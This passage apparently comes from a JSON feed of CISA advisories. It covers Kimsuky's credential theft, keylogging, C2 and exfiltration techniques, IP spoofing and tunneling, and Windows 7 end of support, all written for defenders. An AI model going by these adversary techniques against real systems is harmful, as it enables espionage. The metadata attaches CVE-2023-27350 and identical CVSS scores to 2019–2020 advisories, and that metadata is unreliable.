It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of `ProcDump` in the BabyShark malware.[[48](<https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/>)]
 * According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (_Man-in-the-Browser_ [[T1185](<https://attack.mitre.org/versions/v7/techniques/T1185/>)]).[[49](<https://attack.mitre.org/groups/G0094/>)],[[50](<https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/>)] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named `jQuery.js`, from a separate site (see figure 3).[[51](<https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/>)]

_Figure 3: JavaScript file, named `jQuery.js`_ [[52](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)]

 * Kimsuky also uses a PowerShell-based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001/>)], _Network Sniffing_ [[T1040](<https://attack.mitre.org/versions/v7/techniques/T1040/>)]). MECHANICAL logs keystrokes to `%userprofile%\appdata\roaming\apach.{txt,log}` and is also a "cryptojacker," which is a tool that uses a victim’s computer to mine cryptocurrency.
Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[[53](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)]
 * Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between victims and the websites they access and to collect any credentials entered by the victim.[54]

#### Discovery

Kimsuky enumerates system information and the file structure for victims’ computers and networks (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (_File and Directory Discovery_ [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083/>)]). The information is directed to `C:\WINDOWS\msdatl3.inc`, read by malware, and likely emailed to the malware’s command server.[[55](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]

#### Collection

Kimsuky collects data from the victim system through its HWP document malware and its keylogger (_Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)]). The HWP document malware changes the default program association in the Registry to open HWP documents (_Event Triggered Execution: Change Default File Association_ [[T1546.001](<https://attack.mitre.org/versions/v7/techniques/T1546/001/>)]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred.
The keylogger intercepts keystrokes and writes them to `C:\\Program Files\\Common Files\\System\\Ole DB\\msolui80.inc` and records the active window name where the user pressed keys (_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001/>)]). There is another keylogger variant that logs keystrokes into `C:\\WINDOWS\\setup.log`.[[56](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\nKimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (_Command and Scripting Interpreter: Python_ [[T1059.006](<https://attack.mitre.org/versions/v7/techniques/T1059/006/>)]). The Python program downloads various implants based on C2 options specified after `filedown.php` (see figure 4).\n\n_Figure 4: Python script targeting Mac OS_ [57]\n\n#### Command and Control\n\nKimsuky has used a modified TeamViewer client, version 5.0.9104, for _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] (_Remote Access Software_ [[T1219](<https://attack.mitre.org/versions/v7/techniques/T1219/>)]). During the initial infection, the service \u201cRemote Access Service\u201d is created and adjusted to execute `C:\\Windows\\System32\\vcmon.exe` at system startup (_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder_ [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)]). Every time `vcmon.exe` is executed, it disables the firewall by zeroing out Registry values (_Impair Defenses: Disable or Modify System Firewall_ [[T1562.004](<https://attack.mitre.org/versions/v7/techniques/T1562/004/>)]). The program then modifies the TeamViewer Registry settings by changing the `TeamViewer` strings in TeamViewer components. The launcher then configures several Registry values, including `SecurityPasswordAES`, that control how the remote access tool will work. 
The `SecurityPasswordAES` Registry value represents a hash of the password used by a remote user to connect to the TeamViewer client (_Use Alternate Authentication Material: Pass the Hash_ [[T1550.002](<https://attack.mitre.org/techniques/T1550/002/>)]). This way, the attackers set a pre-shared authentication value to gain access to the TeamViewer client. The attacker then executes the TeamViewer client `netsvcs.exe`.[[58](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\nKimsuky has been using a consistent C2 URL format. In the URL used recently\u2014`express[.]php?op=1`\u2014there appears to be an option range from 1 to 3.[59]\n\n#### Exfiltration\n\nOpen-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email, or encrypted with an RC4 key generated as an MD5 hash or a randomly generated 117-byte buffer (_Exfiltration_ [[TA0010](<https://attack.mitre.org/versions/v7/tactics/TA0010/>)]).\n\nThere was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky\u2019s intention is to steal information, not to disrupt computer networks. Kimsuky\u2019s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (_Archive Collected Data_ [[T1560](<https://attack.mitre.org/versions/v7/techniques/T1560>)]). Kimsuky also sets up auto-forward rules within a victim\u2019s email account (_Email Collection: Email Forwarding Rule_ [[T1114.003](<https://attack.mitre.org/versions/v7/techniques/T1114/003/>)]).\n\nKimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-byte buffer to exfiltrate stolen data. The data is sent RSA-encrypted (_Encrypted Channel: Symmetric Cryptography_ [[T1573.001](<https://attack.mitre.org/versions/v7/techniques/T1573/001>)]). 
Kimsuky\u2019s malware constructs a 1120-bit public key and uses it to encrypt the 117-byte buffer. The resulting data file is saved in `C:\\Program Files\\Common Files\\System\\Ole DB\\` (_Data Staged: Local Data Staging_ [[T1074.001](<https://attack.mitre.org/versions/v7/techniques/T1074/001>)]).[[60](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\n### Mitigations\n\n#### Indicators of Compromise\n\nKimsuky has used the domains listed in table 1 to carry out its objectives. For a downloadable copy of IOCs, see [AA20-301A.stix](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-301A.stix.xml>).\n\n_Table 1: Domains used by Kimsuky_\n\n_Table 2: Redacted domains used by Kimsuky_\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Netscout: Stolen Pencil Campaign Targets Academia](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[2] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[3] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[4] Netscout: Stolen Pencil Campaign Targets Academia](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[5] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[6] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities](<https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities>)\n\n[[7] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[8] CrowdStrike: 2020 Global Threat Report](<https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf>)\n\n[[9] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure](<https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/>)\n\n[[10] PwC: Tracking \u2018Kimsuky\u2019, the North Korea-based cyber espionage group: Part 2](<https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html>)\n\n[[11] CrowdStrike: 2020 Global Threat 
Report](<https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf>)\n\n[[12] Netscout: Stolen Pencil Campaign Targets Academia](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[13] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[14] Private Sector Partner\n\n[[15] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[16] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure](<https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/>)\n\n[[17] cyberscoop: North Korea could accelerate commercial espionage to meet Kim\u2019s economic deadline](<https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/>)\n\n[[18] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[19] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[20] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[21] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)\n\n[[22] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. 
National Security Think Tanks](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)\n\n[[23] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)\n\n[[24] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[25] Palo Alto Networks Unit 42: BabyShark Malware Part Two \u2013 Attacks Continue Using KimJongRAT and PCRat](<https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/>)\n\n[[26] McAfee: What is mshta, how can it be used and how to protect against it](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>)\n\n[[27] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)\n\n[[28] Netscout: Stolen Pencil Campaign Targets Academia](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[29] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[30] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. 
National Security Think Tanks](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)\n\n[[31] Netscout: Stolen Pencil Campaign Targets Academia](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[32] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[33] Private Sector Partner\n\n[34] Private Sector Partner\n\n[[35] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[36] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs](<https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/>)\n\n[[37] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs](<https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/>)\n\n[[38] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[39] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[40] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[41] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[42] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[43] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[44] McAfee: What is mshta, how can it be used and how to protect against 
it](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>)\n\n[[45] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities](<https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities>)\n\n[[46] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[47] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[48] Microsoft Security Blog: Detecting credential theft through memory access modelling with Microsoft Defender ATP](<https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/>)\n\n[[49] MITRE ATT&CK: Groups \u2013 Kimsuky](<https://attack.mitre.org/groups/G0094/>)\n\n[[50] ZDNet: Cyber-espionage group uses Chrome extension to infect victims](<https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/>)\n\n[[51] ZDNet: Cyber-espionage group uses Chrome extension to infect victims](<https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/>)\n\n[[52] Netscout: Stolen Pencil Campaign Targets Academia](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[[53] Netscout: Stolen Pencil Campaign Targets Academia](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)\n\n[54] Private Sector Partner\n\n[[55] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[[56] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[57] Private Sector Partner\n\n[[58] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?
](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n[59] Private Sector Partner\n\n[[60] Securelist: The \u201cKimsuky\u201d Operation: A North Korean APT?](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)\n\n### Revisions\n\nOctober 27, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-27T12:00:00", "type": "ics", "title": "North Korean Advanced Persistent Threat Focus: Kimsuky", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2020-10-27T12:00:00", "id": "AA20-301A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-301a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:32:05", "description": "### Summary\n\n_This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u2122) and Pre-ATT&CK frameworks. 
See the MITRE [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) and [Pre-ATT&CK](<https://attack.mitre.org/versions/v7/techniques/pre/>) frameworks for referenced threat actor techniques._\n\nAttributing malicious cyber activity that uses network tunneling and spoofing techniques to a specific threat actor is difficult. Attribution requires analysis of multiple variables, including location. Because threat actors can use these techniques to obfuscate their location, it is not possible to identify the true physical location of malicious activity based solely on the geolocation of an Internet Protocol (IP) address. This Alert discusses how threat actors use these obfuscation techniques to mislead incident responders.\n\n### Technical Details\n\n## Geolocation\n\nThe geolocation of an IP address is often obtained with publicly available information ([WHOIS](<https://whois.icann.org/en/about-whois>) registration) or proprietary information. The level of geographic precision varies widely across sources; some provide country and locality details, while others provide neighborhood-level detail. Additionally, the accuracy of this information varies by source.\n\nHowever, even if the geolocation of an IP address is accurate, the threat actor may not be physically located near it; instead, they may be hiding their true location through the use of spoofing and network tunnels.\n\n## Spoofing\n\nA threat actor can spoof packets with an arbitrary source IP address, which in turn geolocates to a specific country (see figure 1). The actor's physical location may be elsewhere. The actor then initiates their malicious activity. Network defenders see packets originating from a source IP address that did not generate the traffic. 
This technique is most common with connectionless activities, such as distributed _Endpoint Denial of Service_ [[T1499](<https://attack.mitre.org/versions/v7/techniques/T1499/>)] and _Network Denial of Service_ [[T1498](<https://attack.mitre.org/versions/v7/techniques/T1498/>)]\u2014including DNS amplification\u2014attacks.\n\nFigure 1: IP spoofing\n\n## Encapsulating Network Tunnels\n\nA network tunnel encapsulates network traffic between two points (see figure 2). Often network tunnels are used for legitimate purposes, such as secure remote administration or creating virtual private networks (VPNs). However, a malicious cyber actor can use this technique to mask their true source IP address and, therefore, their physical location. The threat actor accomplishes masking by using virtual private servers (VPSs), which can be purchased through commercial providers. The threat actor will initiate a remote network tunnel from their computer to the VPS and then use the VPS to initiate malicious activity. Network defenders see the IP address, as well as the geolocation information, of the VPS. Attempts to identify the cyber actor\u2019s physical location by using the geolocation of the VPS will be inaccurate. Network tunneling is common with malicious _Connection Proxy_ [[T1090](<https://attack.mitre.org/versions/v7/techniques/T1090/>)] activities.\n\nFigure 2: Network tunnel encapsulation\n\nThe ease with which IP addresses can be spoofed and the possibility that activity could be tunneled through a network to intentionally mask the true source prevents any attempt to identify the physical location of the activity based solely on the geolocation of the IP address.\n\n### Mitigations\n\nIn addition to being knowledgeable about threat actor obfuscation techniques, CISA encourages incident responders to review the following best practices to strengthen the security posture of their systems. 
Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.\n\n * Maintain up-to-date antivirus signatures and engines. See [Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>).\n * Ensure systems have the latest security updates. See [Understanding Patches and Software Updates](<https://www.us-cert.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n * Restrict users' permissions to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations that is configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\n\n## Additional Information\n\n[Sign up](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) to receive CISA\u2019s alerts on security topics and threats.\n\nSign up for CISA\u2019s free vulnerability scanning 
and testing services to help organizations secure internet-facing systems from weak configuration and known vulnerabilities. Email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>) to sign up. See <https://www.cisa.gov/cyber-resource-hub> for more information about vulnerability scanning and other CISA cybersecurity assessment services.\n\n## Acknowledgements\n\nPalo Alto Networks and IBM contributed to this Alert.\n\n### References\n\n[Cloudflare Blog: The real cause of large DDoS - IP Spoofing](<https://blog.cloudflare.com/the-root-cause-of-large-ddos-ip-spoofing/>)\n\n[Cisco Configuration Guide: Implementing Tunnels](<https://www.cisco.com/c/en/us/td/docs/ios/12_4/interface/configuration/guide/inb_tun.html>)\n\n### Revisions\n\nJuly 16, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Malicious Cyber Actor Use of Network Tunneling and Spoofing to Obfuscate Geolocation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2020-10-24T12:00:00", "id": "AA20-198A", "href": 
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-198a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:35:08", "description": "### Summary\n\n_**Note**: This alert does not apply to federally certified voting systems running Windows 7. Microsoft will continue to provide free security updates to those systems through the 2020 election. See Microsoft\u2019s article, [Extending free Windows 7 security updates to voting systems](<https://blogs.microsoft.com/on-the-issues/2019/09/20/extending-free-windows-7-security-updates-to-voting-systems/>), for more information._\n\nOn January 14, 2020, Microsoft will end extended support for their Windows 7 and Windows Server 2008 R2 operating systems.[[1]](<https://www.microsoft.com/en-us/windows/windows-7-end-of-life-support-information>) After this date, these products will no longer receive free technical support, or software and security updates.\n\nOrganizations that have regulatory obligations may find that they are unable to satisfy compliance requirements while running Windows 7 and Windows Server 2008 R2.\n\n### Technical Details\n\nAll software products have a lifecycle. \u201cEnd of support\u201d refers to the date when the software vendor will no longer provide automatic fixes, updates, or online technical assistance. [[2]](<https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet>)\n\nFor more information on end of support for Microsoft products see the [Microsoft End of Support FAQ](<https://www.microsoft.com/en-us/windows/windows-7-end-of-life-support-information>).\n\nSystems running Windows 7 and Windows Server 2008 R2 will continue to work at their current capacity even after support ends on January 14, 2020. However, using unsupported software may increase the likelihood of malware and other security threats. 
Mission and business functions supported by systems running Windows 7 and Windows Server 2008 R2 could experience negative consequences resulting from unpatched vulnerabilities and software bugs. These negative consequences could include the loss of confidentiality, integrity, and availability of data, system resources, and business assets.\n\n### Mitigations\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and organizations to:\n\n * Upgrade to a newer operating system.\n * Identify affected devices to determine the breadth of the problem and assess the risk of not upgrading.\n * Establish and execute a plan to systematically migrate to currently supported operating systems or employ a cloud-based service.\n * Contact the operating system vendor to explore opportunities for fee-for-service maintenance, if unable to upgrade.\n\n### References\n\n[[1] Microsoft End of Support FAQ](<https://www.microsoft.com/en-us/windows/windows-7-end-of-life-support-information>)\n\n[[2] Microsoft Windows Lifecycle Fact Sheet](<https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet>)\n\n[[3] Microsoft Windows Upgrade and Migration Considerations](<https://docs.microsoft.com/en-us/windows/deployment/upgrade/windows-upgrade-and-migration-considerations>)\n\n[[4] ComputerWorld: Leaving Windows 7? 
Here are Some non-Windows Options](<https://www.computerworld.com/article/3431616/leaving-windows-7-here-are-some-non-windows-options.html>)\n\n[[5] CISA Analysis Report AR19-133A: Microsoft Office 365 Security Observations](<https://www.us-cert.gov/ncas/analysis-reports/AR19-133A>)\n\n### Revisions\n\nOctober 17, 2019: Initial version\n\nOctober 18, 2019: Added note\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-18T12:00:00", "type": "ics", "title": "Microsoft Ending Support for Windows 7 and Windows Server 2008 R2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2019-10-18T12:00:00", "id": "AA19-290A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-290a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:30:50", "description": "### Summary\n\n**_This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection._**\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) version 7 
framework. See the [ATT&CK for Enterprise version 7](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health (HPH) Sector to infect systems with ransomware, notably Ryuk and Conti, for financial gain.\n\nCISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.\n\nClick here for a PDF version of this report.\n\n#### Key Findings\n\n * CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.\n * These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.\n\n### Technical Details\n\n### Threat Details\n\nThe cybercriminal enterprise behind TrickBot, which is likely 